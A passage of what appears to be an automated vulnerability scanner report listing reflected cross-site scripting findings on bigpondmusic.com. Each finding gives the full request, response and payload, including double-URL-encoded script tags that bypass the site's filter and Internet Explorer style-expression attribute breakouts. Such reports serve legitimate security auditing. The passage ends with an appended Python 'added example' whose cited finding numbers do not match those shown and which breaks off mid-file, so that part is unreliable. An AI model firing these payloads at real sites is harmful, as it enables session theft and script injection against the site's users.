<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc46a2';0a91471649d';
   s.prop4 = 'susan-boyle';
   s.prop5 = 'the-gift11';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 +
...[SNIP]...

2.138. http://bigpondmusic.com/album/susan-boyle/the-gift11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/susan-boyle/the-gift11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 178a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9a6fc79742 was submitted in the REST URL parameter 1. This input was echoed as 178a7"><script>alert(1)</script>e9a6fc79742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album178a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9a6fc79742/susan-boyle/the-gift11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88010


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album178a7"><script>alert(1)</script>e9a6fc79742/susan-boyle/the-gift11" />
...[SNIP]...

2.139. http://bigpondmusic.com/album/susan-boyle/the-gift11 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/susan-boyle/the-gift11

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a090"style%3d"x%3aexpression(alert(1))"a680221f896 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5a090"style="x:expression(alert(1))"a680221f896 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/susan-boyle/the-gift11?5a090"style%3d"x%3aexpression(alert(1))"a680221f896=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111091


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Susan Boyle - The Gift - Big
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/susan-boyle/the-gift11?5a090"style="x:expression(alert(1))"a680221f896=1" />
...[SNIP]...

2.140. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7eadba08219 was submitted in the REST URL parameter 1. This input was echoed as 602e6"><script>alert(1)</script>7eadba08219 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album602e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7eadba08219/taio-cruz/rokstarr2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88103


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album602e6"><script>alert(1)</script>7eadba08219/taio-cruz/rokstarr2" />
...[SNIP]...

2.141. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71002'%3bb52b77c9e1e was submitted in the REST URL parameter 1. This input was echoed as 71002';b52b77c9e1e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album71002'%3bb52b77c9e1e/taio-cruz/rokstarr2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87821


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album71002';b52b77c9e1e';
   s.prop4 = 'taio-cruz';
   s.prop5 = 'rokstarr2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|'
...[SNIP]...

2.142. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c97"style%3d"x%3aexpression(alert(1))"d7b1258e9f1 was submitted in the h parameter. This input was echoed as 57c97"style="x:expression(alert(1))"d7b1258e9f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/taio-cruz/rokstarr2?h=64970803157c97"style%3d"x%3aexpression(alert(1))"d7b1258e9f1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119583


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Taio Cruz - Rokstarr - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/taio-cruz/rokstarr2?h=64970803157c97"style="x:expression(alert(1))"d7b1258e9f1" />
...[SNIP]...

2.143. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f37a"style%3d"x%3aexpression(alert(1))"764939ac8af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7f37a"style="x:expression(alert(1))"764939ac8af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/taio-cruz/rokstarr2?7f37a"style%3d"x%3aexpression(alert(1))"764939ac8af=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Taio Cruz - Rokstarr - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/taio-cruz/rokstarr2?7f37a"style="x:expression(alert(1))"764939ac8af=1" />
...[SNIP]...

2.144. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61a06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd0cbc868bf was submitted in the REST URL parameter 1. This input was echoed as 61a06"><script>alert(1)</script>fd0cbc868bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album61a06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd0cbc868bf/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88307


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album61a06"><script>alert(1)</script>fd0cbc868bf/tom-petty-and-the-heartbreakers/damn-the-torpedoes2" />
...[SNIP]...

2.145. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66c43'%3bf6bdc372dd0 was submitted in the REST URL parameter 1. This input was echoed as 66c43';f6bdc372dd0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album66c43'%3bf6bdc372dd0/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87915


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album66c43';f6bdc372dd0';
   s.prop4 = 'tom-petty-and-the-heartbreakers';
   s.prop5 = 'damn-the-torpedoes2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|
...[SNIP]...

2.146. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bdab"style%3d"x%3aexpression(alert(1))"842ee7acee9 was submitted in the h parameter. This input was echoed as 8bdab"style="x:expression(alert(1))"842ee7acee9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?h=7653777758bdab"style%3d"x%3aexpression(alert(1))"842ee7acee9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 139217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Tom Petty And The Heartbreak
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?h=7653777758bdab"style="x:expression(alert(1))"842ee7acee9" />
...[SNIP]...

2.147. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c37f"style%3d"x%3aexpression(alert(1))"ce276fa3e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c37f"style="x:expression(alert(1))"ce276fa3e26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?8c37f"style%3d"x%3aexpression(alert(1))"ce276fa3e26=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 139838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Tom Petty And The Heartbreak
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?8c37f"style="x:expression(alert(1))"ce276fa3e26=1" />
...[SNIP]...

2.148. http://bigpondmusic.com/album/uriah-heep/the-collection91 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd5c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ad0e09dbc1 was submitted in the REST URL parameter 1. This input was echoed as 4fd5c"><script>alert(1)</script>4ad0e09dbc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album4fd5c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ad0e09dbc1/uriah-heep/the-collection91 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88222


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album4fd5c"><script>alert(1)</script>4ad0e09dbc1/uriah-heep/the-collection91" />
...[SNIP]...
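The bypass and the attribute breakout described in this finding, modelled as an added example. This is the editor's Python, not code from bigpondmusic.com or from the scanner report: the request targets and the `parentUrl` hidden-input layout are copied from the request and response above, but the blacklist contents, the fact that it is applied to the path only (assumed because raw quotes in the query string were reflected in 2.150 while the same characters in the path were not), and the decode order are assumptions made to reproduce the symptom. The same attribute-context fix also covers the `"style="x:expression(alert(1))"` reflections (2.150, 2.151, 2.154, 2.155, 2.158, 2.161), which land in the same attribute.

```python
# Added example (editor's model, not bigpondmusic.com code): reproduces the
# double-URL-decode bypass behind findings 2.148/2.153/2.157/2.159 and the
# attribute breakout behind 2.150/2.151, then shows the fix.
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Assumed: the characters the application's blacklist rejects in the path.
BLOCKED = set('<>"\'')

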